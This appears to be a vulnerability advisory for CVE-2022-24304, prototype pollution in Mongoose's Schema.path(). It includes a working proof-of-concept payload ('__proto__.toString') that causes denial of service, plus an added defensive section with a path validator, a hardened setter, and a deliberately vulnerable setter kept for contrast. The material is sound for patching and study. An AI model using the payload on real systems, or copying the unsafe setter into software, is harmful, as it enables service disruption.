CVE-2022-24304
Mongoose Vulnerable to Prototype Pollution in Schema Object
Description
### Description

Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment. Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.

### Proof of Concept

```js
// poc.js
const mongoose = require('mongoose');

const schema = new mongoose.Schema();
// A dotted path whose first segment is __proto__ walks onto Object.prototype.
const malicious_payload = '__proto__.toString';
schema.path(malicious_payload, [String]);

// An unrelated object now inherits the overwritten toString.
const x = {};
console.log(x.toString()); // crashes (Denial of Service (DoS))
```

### Impact

This vulnerability can be manipulated to exploit other types of attacks, such as Denial of Service (DoS), Remote Code Execution, or Property Injection.
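The following is an added illustration, not Mongoose's own code: a guard that rejects dotted schema paths containing prototype-walking segments, beside a minimal nested setter that shows why a path such as `__proto__.toString` lands on `Object.prototype`. The function names and the harmless demonstration key are constructed for this example.

```javascript
// Segments that make a dotted-path walk land on a prototype instead of an own property.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Reject any schema path containing a forbidden or empty segment.
function isSafeSchemaPath(path) {
  if (typeof path !== 'string' || path.length === 0) return false;
  return path.split('.').every((seg) => seg.length > 0 && !FORBIDDEN_SEGMENTS.has(seg));
}

// Naive nested setter: "a.b.c" -> obj.a.b.c = value. With "__proto__.x" the walk
// descends into Object.prototype, because obj['__proto__'] is never null.
function setNestedUnsafe(obj, path, value) {
  const parts = path.split('.');
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (cur[parts[i]] == null) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Hardened setter: validate the path first, and create intermediate objects
// whenever the segment is not an own property (so inherited ones are never walked).
function setNestedSafe(obj, path, value) {
  if (!isSafeSchemaPath(path)) {
    throw new TypeError(`Rejected unsafe schema path: ${JSON.stringify(path)}`);
  }
  const parts = path.split('.');
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (!Object.prototype.hasOwnProperty.call(cur, parts[i])) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Reproduces the pollution with a harmless constructed key instead of toString,
// then removes it again. Returns true if an unrelated object inherited the value.
function demonstratePollution() {
  const key = 'pollutedByExample';
  setNestedUnsafe({}, `__proto__.${key}`, 'injected');
  const leaked = ({})[key] === 'injected';
  delete Object.prototype[key];
  return leaked;
}
```

The same segment check is what a defender would apply to any user-controlled key that reaches a nested setter, not only to `Schema.path()`.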
How to fix CVE-2022-24304
To remediate CVE-2022-24304, upgrade the affected package to a fixed version below.
- Upgrade to 6.4.6 or later
Is CVE-2022-24304 being exploited?
No exploitation signal available. Neither CISA KEV nor a current EPSS score has been published for CVE-2022-24304.
Affected packages (1)
- >= 6.0.0, < 6.4.6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (6)
- ADVISORY: nvd.nist.gov/vuln/detail/CVE-2022-24304
- WEB: github.com/Automattic/mongoose/blob/51e758541763b6f14569744ced15cc23ab8b50c6/lib/schema.js#L88-L141
- WEB: github.com/Automattic/mongoose/commit/6a197316564742c0422309e1b5fecfa4faec126e
- WEB: github.com/Automattic/mongoose/commit/a45cfb6b0ce0067ae9794cfa80f7917e1fb3c6f8